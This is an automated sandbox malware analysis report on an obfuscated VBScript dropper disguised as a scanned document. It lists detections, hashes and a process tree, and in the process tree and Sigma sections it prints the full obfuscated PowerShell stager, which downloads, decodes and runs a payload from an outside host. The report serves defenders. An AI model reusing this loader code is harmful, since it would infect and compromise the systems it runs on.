Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SKMBT20783_ZM.vbs

Overview

General Information

Sample name:SKMBT20783_ZM.vbs
Analysis ID:1640544
MD5:0e513e80fc18e3db4f0eb6ecb558534b
SHA1:ed04ef0cfbea67f8936132ec9a42650740566353
SHA256:7444d08579781b3d7b233e9fd3e7f9b31a85837c29adf2f4ae7965a628078639
Tags:vbsuser-smica83
Infos:

Detection

Score:84
Range:0 - 100
Confidence:100%

Signatures

VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
Joe Sandbox ML detected suspicious sample
Potential evasive VBS script found (sleep loop)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Writes or reads registry keys via WMI
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 1432 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT20783_ZM.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WmiPrvSE.exe (PID: 5420 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 4020 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Russule; function Tvangsmiddels($Backgeared){$Submerge=4;do {$Ima+=$Backgeared[$Submerge];$Pjat=Format-List;$Submerge+=5} until(!$Backgeared[$Submerge])$Ima}function Ankomsterne($Dolors20){ .($Indeficiency) ($Dolors20)}$Ergoterapeutskoler=Tvangsmiddels 'Int,NHypeeMeteTObel.NykaW';$Ergoterapeutskoler+=Tvangsmiddels ',ngeEClieBErn cTricLHalviCen,eHom nForst';$Postethmoid=Tvangsmiddels 'SivaMTogfoDemizE triVarslBulllFlaca Da /';$Recuperator=Tvangsmiddels ' SinT A.ol Mi.svo d1Vi k2';$Destalinises136=' Nov[PussNBukseMisttGevi. WilS veeSkylrSvanVan oI Semc DiseAftepBetiO StoiWestn T,ltKlynM LacahydrNEft AEl aG B dE DisrSupp]Henv:Gunh: SmasCor E LreC acoustewrBargiFlu tPupiyFu fP ympRItenOSulptOffeOFinaC,alaoHaanlJ,me=Send$ TyfrSgekEMythC StoUEmbeP eskePolir ,araU maTBestOK,olR';$Postethmoid+=Tvangsmiddels 'Jnan5 Phr.Cham0cel, Ph,n(AssiWIn.eiHe enCo ndRiddo NonwCo gsPsyc AbroNFodeTNeut Pse1Ddni0genn. Shi0 Und; Ana SquiWAnstiW,rbnInte6 Tin4Pers; Hys AntexSpej6 Lus4kirk;Farb U,fjrGeo.vMacr:Efte1B ot3No.i4 S,u. egu0 nvr)term Ma.GLatieSvalcIndsk UdmoAmts/Repr2G rn0Kern1 niv0Dels0N bo1.rug0Re d1Tomo SlibFUd.eiAabnru.reeRamsf SigoRef xudv /Fode1fryg3 Dem4Derv.Retr0';$pseudocosta=Tvangsmiddels 'cannUud.rsPracE SemRGuar-Bu ia harGOpb,ePhilNHotet';$Butter=Tvangsmiddels ' rsthLamitBrent ,orpSubesanth:amat/I.gm/nordaAudig Selh SinaM gryD skehelmzBogkaMaoiyGnide MetaOunctChee. I diTrffrOilc/ intkB.haiPr,cd VedsBrom/ CatTwienyVek.rKanvoT.adsAfgiiDukknM kseOmnis Sub.Pu.hlEngazMellh';$Misfortuner=Tvangsmiddels 'Sag,>';$Indeficiency=Tvangsmiddels 'Sa gi eade P,rX';$Semidefiniteness139='Vaabenmrkerne';$Fiskerflaaden='\Hikes.Ove';Ankomsterne (Tvangsmiddels ' va$AtteGSubslhumaO agtbHeksahandlTelt: StaN WhiEUdruPEsc eA raNBrodd emmiF gesAvis=evol$slutESt rNSangvDavi: AliA SnnpUnd.PNotrdWhydaA phT DevaRepa+Beu $Kibyf oaiGibbs lbrKGe meB,ggr PosFHalsLTandAPostAExo.dR vrEBilln');Ankomsterne (Tvangsmiddels 'Lige$Sed,GBe tL,resoSounBTrumaForllOpb :VermKOdondclinf CerUO krlAngsdObcl= Svl$Indubsog UAntit athtWiree MesRProf. EvoS Undpb sclLegeiSjllTIn u( I f$ HaaMKompI L,dSPropFBillOUranR braT TilUCrisNK.oaeOmslrSkid)');Ankomsterne (Tvangsmiddels $Destalinises136);$Butter=$Kdfuld[0];$Keyseat=(Tvangsmiddels ' Lim$ QuiG,orsL,ubboUnivBCensAOverlTjen:Pi.kIModfnPl sFp ntO ,ksrFrinMKum ATr.nT.abbIXy ioParaNGomeSDegliPo iNDodedOldnSTopaAK imTBulbsTils=Sucrn,alsEUmu w Tyd-DelsOInt,B.undJInhaEKir cIn eTReso P.aS T,yyaspasBlint.amie UnpMBou .Chef$Bl,rESkanRH stGMedsoAntitRespe VeaRFaktaAltrPVercEFormuFritTAgris Re KNontOGa.llPulpeSyndr');Ankomsterne ($Keyseat);Ankomsterne (Tvangsmiddels 'Slvp$Kn kIrushnPennfChicoMajbrRdtjm Coma OvetCataiRelaoVertnInddschloiTak n Ta.dportsSeisaPastt FidsHost.BagsHShore vfdaBur.dn rremirarMuresfarl[Purp$Anopp TegsSimieKnuruFlomdshi oPraecEinsoT rts Dkkt etraobse] odi=Acti$BolsPFondophi sPriztLimieButttBackh KhamBomroOu biUdkrd');$Mourningly=Tvangsmiddels 'Hove$SgsmI GalnMe,ifTve,oBenarUds.mMul a MtatPapiiDerioNon.nSkrisTorni adinJctgd TrksRotaaSkrgtAntisFore. BaaDUnivoGrouw BilnKapilRituo edbaHal dGrufF Pi,iFornl loae Lay( ans$al,eBDecaugloetOpprtforke DinrPlon,,ary$CantSre teP.otiD.lessek.mBloko Sk lKure)';$Seismol=$Nependis;Ankomsterne (Tvangsmiddels 'Ho,s$WerngMikrLDarroStalbunreAUd al Yok:.kgam KviGGainF HiraFlodl idsDL,seeUdvitSlagS,nke=Asmi( AartunsieR ngsUerhTHelb-UnropkommAPinetBlo HHu.n Henv$LedtS Ko.eRediI Di.S IhuMPausO UsalTale)');while (!$mgfaldets) {Ankomsterne (Tvangsmiddels 'Frde$ Angg Ultl D.roTa.kbHvlva Pollnonv:A klK ndoagopluTurikcym aRa,isUptuiNonceSickrdistnOc,reFriksVare= Sec$Klo,CUndeoVitenLivljHudluovercN octCataiThegvQuena') ;Ankomsterne $Mourningly;Ankomsterne (Tvangsmiddels 'Open[VerdtKl,pHGastREmulEAlloaAp sD Besi ParNDetegW,ol.S lvti teH V drBurbeTutoAGip,DUnd ]Poet: ige:TolvSUdlilHaste,lerEHa pPSono(F,re4Ur d0Paci0Medi0Fagp)');Ankomsterne (Tvangsmiddels ' Uni$Bed GBfpoL S rOObjeBSisya ifflRemo:sukkmUnvigR.mofsamaA JudlV.ind TileSeleTY,glSUfri= For( PheTA ybE b is HemT Sol- P,opOutpAConctarchhbedi Se.m$ .nrsDy aeFeltIImprSzin m ffioCranl Lan)') ;Ankomsterne (Tvangsmiddels 'Skuf$UnivgEftelBaskOVelfBbaseASu aL gag:InclPkorrUSpdbLSca =Pava$seddGTidoLSkilo BreB JudAUndelTil :RayneVertriridYReskt yshKommRB,llEH lmnRefeeDres+rds +Refo%wo s$Kv kKPaatdOphnF prauPreelDi.tdUnre. remcSpriOWhopUAftaN Arbt') ;$Butter=$Kdfuld[$Pul]}$Filologs=332816;$Bandlysninger=31302;Ankomsterne (Tvangsmiddels 'Sluk$DisaGS rylBocco ForbC loADrablObdi: efaG SomlGrusY TraPCarbHCitrOAarsGOwasRJobbapregp AdjHDioi My i= Acc OutlgDeisE KonTPiet- Varc MidOBot NFje,tOpmuEThunNinteT Uko at$TribsAcc,e DecI Skys StiMIncuOViscL');Ankomsterne (Tvangsmiddels 'staf$SympgUaktlG,laobehebSa ua udvlPert: spoSUnd tSordrSt aa loynKlbndF onhModsuMustgChils nstGnideMe,lr FiosSoci Atio=Herm Int [BumpSKredymormsGo,otCarceTit mPaha.Ev.lCFieloSnign,attv RegeBesmr.rudtSpro]Gula:Pseu:Plu Fcrocr,ssyo RidmRepoBDosiaSquas Laee Bun6 Gui4AnemS BrytBlinrCorbiColon smigViru(A is$UnreG,amel SkeyConcpSgekhFr,toMollg OpmrJakoaForep VejhSkon)');Ankomsterne (Tvangsmiddels 'Ele $CostGPr aLKattOmineBUgenA AfsLFul : ocapSheloDia LKepiINvebNTonsi R jCarkiePerssSan, Spro= Sid L v[UforSlar y,efoSSlg t P reLaryM Dis. achtKommE,attxSupeTMa.t.KoorEErnrn.eguCU.ino lidForliAnekNSkytGElek]M sr: he:SacrA genSmaskC DefIDip IArer.PanaGS riePr mttillsDeintStavrP ajIUnslnDecugPi,i(N an$UnprsS mftOks.r.anoA E gNMultdFejlhLoboUAandGT mpSSammtBasse LotrDi tsAnnu)');Ankomsterne (Tvangsmiddels 'mult$ urngUnrolRespoRiffBNitaAPhytLIntr:RevipHft R SkoIGud,sLlamVLandrStafDUdvai Uncg forS elTUn eeOutf=R,gh$Pr,hPT ldOInarlDefliBeh N D.tiForaCFor.ET baSNona. Recs,dspuTerpB xiSAntiT NonrDrabIKol nDekaGLini( Rom$k naf ,isIary LTarioUdkol ForoEt,dgS.icSNgst,Or i$EpigB Ap A V nN tylD edeLAnthYBu lsUnflnSpecIRaslN Ch gTilbeShrirHypa)');Ankomsterne $Prisvrdigste;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 3972 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 4020JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_4020.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: WScript or CScript Dropper
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT20783_ZM.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT20783_ZM.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT20783_ZM.vbs", ProcessId: 1432, ProcessName: wscript.exe
      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT20783_ZM.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT20783_ZM.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT20783_ZM.vbs", ProcessId: 1432, ProcessName: wscript.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Russule; function Tvangsmiddels($Backgeared){$Submerge=4;do {$Ima+=$Backgeared[$Submerge];$Pjat=Format-List;$Submerge+=5} until(!$Backgeared[$Submerge])$Ima}function Ankomsterne($Dolors20){ .($Indeficiency) ($Dolors20)}$Ergoterapeutskoler=Tvangsmiddels 'Int,NHypeeMeteTObel.NykaW';$Ergoterapeutskoler+=Tvangsmiddels ',ngeEClieBErn cTricLHalviCen,eHom nForst';$Postethmoid=Tvangsmiddels 'SivaMTogfoDemizE triVarslBulllFlaca Da /';$Recuperator=Tvangsmiddels ' SinT A.ol Mi.svo d1Vi k2';$Destalinises136=' Nov[PussNBukseMisttGevi. WilS veeSkylrSvanVan oI Semc DiseAftepBetiO StoiWestn T,ltKlynM LacahydrNEft AEl aG B dE DisrSupp]Henv:Gunh: SmasCor E LreC acoustewrBargiFlu tPupiyFu fP ympRItenOSulptOffeOFinaC,alaoHaanlJ,me=Send$ TyfrSgekEMythC StoUEmbeP eskePolir ,araU maTBestOK,olR';$Postethmoid+=Tvangsmiddels 'Jnan5 Phr.Cham0cel, Ph,n(AssiWIn.eiHe enCo ndRiddo NonwCo gsPsyc AbroNFodeTNeut Pse1Ddni0genn. Shi0 Und; Ana SquiWAnstiW,rbnInte6 Tin4Pers; Hys AntexSpej6 Lus4kirk;Farb U,fjrGeo.vMacr:Efte1B ot3No.i4 S,u. egu0 nvr)term Ma.GLatieSvalcIndsk UdmoAmts/Repr2G rn0Kern1 niv0Dels0N bo1.rug0Re d1Tomo SlibFUd.eiAabnru.reeRamsf SigoRef xudv /Fode1fryg3 Dem4Derv.Retr0';$pseudocosta=Tvangsmiddels 'cannUud.rsPracE SemRGuar-Bu ia harGOpb,ePhilNHotet';$Butter=Tvangsmiddels ' rsthLamitBrent ,orpSubesanth:amat/I.gm/nordaAudig Selh SinaM gryD skehelmzBogkaMaoiyGnide MetaOunctChee. I diTrffrOilc/ intkB.haiPr,cd VedsBrom/ CatTwienyVek.rKanvoT.adsAfgiiDukknM kseOmnis Sub.Pu.hlEngazMellh';$Misfortuner=Tvangsmiddels 'Sag,>';$Indeficiency=Tvangsmiddels 'Sa gi eade P,rX';$Semidefiniteness139='Vaabenmrkerne';$Fiskerflaaden='\Hikes.Ove';Ankomsterne (Tvangsmiddels ' va$AtteGSubslhumaO agtbHeksahandlTelt: StaN WhiEUdruPEsc eA raNBrodd emmiF gesAvis=evol$slutESt rNSangvDavi: AliA SnnpUnd.PNotrdWhydaA phT DevaRepa+Beu $Kibyf oaiGibbs lbrKGe meB,ggr PosFHalsLTandAPostAExo.dR vrEBilln');Ankomsterne (Tvangsmiddels 'Lige$Sed,GBe tL,resoSounBTrumaForllOpb :VermKOdondclinf CerUO krlAngsdObcl= Svl$Indubsog UAntit athtWiree MesRProf. EvoS Undpb sclLegeiSjllTIn u( I f$ HaaMKompI L,dSPropFBillOUranR braT TilUCrisNK.oaeOmslrSkid)');Ankomsterne (Tvangsmiddels $Destalinises136);$Butter=$Kdfuld[0];$Keyseat=(Tvangsmiddels ' Lim$ QuiG,orsL,ubboUnivBCensAOverlTjen:Pi.kIModfnPl sFp ntO ,ksrFrinMKum ATr.nT.abbIXy ioParaNGomeSDegliPo iNDodedOldnSTopaAK imTBulbsTils=Sucrn,alsEUmu w Tyd-DelsOInt,B.undJInhaEKir cIn eTReso P.aS T,yyaspasBlint.amie UnpMBou .Chef$Bl,rESkanRH stGMedsoAntitRespe VeaRFaktaAltrPVercEFormuFritTAgris Re KNontOGa.llPulpeSyndr');Ankomsterne ($Keyseat);Ankomsterne (Tvangsmiddels 'Slvp$Kn kIrushnPennfChicoMajbrRdtjm Coma OvetCataiRelaoVertnInddschloiTak n Ta.dportsSeisaPastt FidsHost.BagsHShore vfdaBur.dn rremirarMuresfarl[Purp$Anopp TegsSimieKnuruFlomdshi oPraecEinsoT rts Dkkt etraobse] odi=Acti$BolsPFondophi sPriztLimieButttBackh KhamBomroOu biUdkrd');$Mourningly=Tvangsmiddels 'Hove$SgsmI GalnMe,ifTve
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3972, ProcessName: svchost.exe

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Joe Sandbox ML detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.2% probability
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2203959925.00000270FD0C2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000002.00000002.2203959925.00000270FD060000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: em.Core.pdbpdb source: powershell.exe, 00000002.00000002.2199935170.00000270FAF94000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbT source: powershell.exe, 00000002.00000002.2203959925.00000270FD0B9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.2203959925.00000270FD0B9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2203959925.00000270FD0C2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2202210988.00000270FCE95000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000002.00000002.2202210988.00000270FCE95000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: embly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2202210988.00000270FCEC6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: utomation.pdb source: powershell.exe, 00000002.00000002.2199935170.00000270FAF94000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000002.00000002.2203959925.00000270FD060000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2203959925.00000270FD0C2000.00000004.00000020.00020000.00000000.sdmp

      Software Vulnerabilities

      barindex
      Suspicious execution chain found
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: aghayezayeat.ir
      Source: svchost.exe, 00000005.00000002.2174549734.0000025CEFC00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
      Source: wscript.exe, 00000000.00000003.984407369.0000021DA62C8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.983021913.0000021DA62C8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.984931075.0000021DA62C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.w
      Source: wscript.exe, 00000000.00000003.884550858.0000021DA8213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
      Source: wscript.exe, 00000000.00000003.984407369.0000021DA628A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.984931075.0000021DA628A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.983021913.0000021DA624E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
      Source: wscript.exe, 00000000.00000003.984407369.0000021DA628A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.984931075.0000021DA628A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.983021913.0000021DA624E000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: wscript.exe, 00000000.00000003.884991399.0000021DA8171000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.885202022.0000021DA81E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.885081500.0000021DA81BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?88f5d08ec4949
      Source: wscript.exe, 00000000.00000003.885202022.0000021DA8198000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.890864007.0000021DA81AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.884991399.0000021DA8171000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?88f5d08ec4
      Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: edb.log.5.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: powershell.exe, 00000002.00000002.2196187747.00000270901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2196187747.0000027090072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.2171748938.0000027080227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.2171748938.0000027080001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.2171748938.0000027080227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.2171748938.0000027081D3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171748938.0000027081918000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171748938.00000270813F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171748938.0000027080E18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171748938.00000270808E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171748938.000002708222B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171748938.0000027081D8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171748938.0000027081A88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171748938.0000027081727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171748938.0000027080227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171748938.0000027080572000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171748938.0000027080C16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171748938.0000027082042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aghayezayeat.ir
      Source: powershell.exe, 00000002.00000002.2171748938.0000027080227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aghayezayeat.ir/kids/Tyrosines.lzhP
      Source: powershell.exe, 00000002.00000002.2171748938.0000027080001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000002.00000002.2196187747.0000027090072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.2196187747.0000027090072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.2196187747.0000027090072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
      Source: svchost.exe, 00000005.00000003.1203044606.0000025CEFA20000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
      Source: powershell.exe, 00000002.00000002.2171748938.0000027080227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.2196187747.00000270901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2196187747.0000027090072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: qmgr.db.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:

      System Summary

      barindex
      Writes or reads registry keys via WMI
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
